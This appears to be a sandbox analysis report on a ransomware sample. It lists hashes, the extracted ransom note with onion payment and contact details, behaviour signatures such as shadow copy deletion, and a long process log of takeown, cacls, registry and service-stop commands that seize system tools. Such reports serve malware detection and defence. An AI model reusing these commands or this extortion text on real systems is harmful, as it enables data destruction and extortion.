Analysis
-
max time kernel
105s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
28-03-2023 18:45
General
-
Target
tmp.exe
-
Size
530KB
-
MD5
57c683e8ab7b7e1390c037c9a97c7688
-
SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7
-
SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096
-
SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953
-
SSDEEP
12288:5hCkSyRGBePYCVWFQ28zqIN6wqFYvt3V/RiR:3CkSyuCYSWFdoqIIwBt3lRiR
Score
10/10
Malware Config
Extracted
Path
C:\Program Files\7-Zip\Lang\FILE RECOVERY.txt
Ransom Note
Hello
Your files are encrypted and can not be used
To return your files in work condition you need decryption tool
Follow the instructions to decrypt all your data
Do not try to change or restore files yourself, this will break them
If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB
How to get decryption tool:
1) Download and install TOR browser by this link: https://www.torproject.org/download/
2) If TOR blocked in your country and you can't access to the link then use any VPN software
3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
4) Copy your private ID in the input field. Your Private key: 1C2F6C738020672DEEAC52ED
5) You will see payment information and we can make free test decryption here
Our blog of leaked companies:
wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org
Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. �
Emails
mallox.resurrection@onionmail.org
URLs
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
Clears Windows event logs 1 TTPs 64 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service settings 1 TTPs
Alters the configuration of existing services.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 18 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 2 IoCs
-
Enumerates processes with tasklist 1 TTPs 6 IoCs
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 64 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HaoZipSvc4⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net1.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net1.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\mshta.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
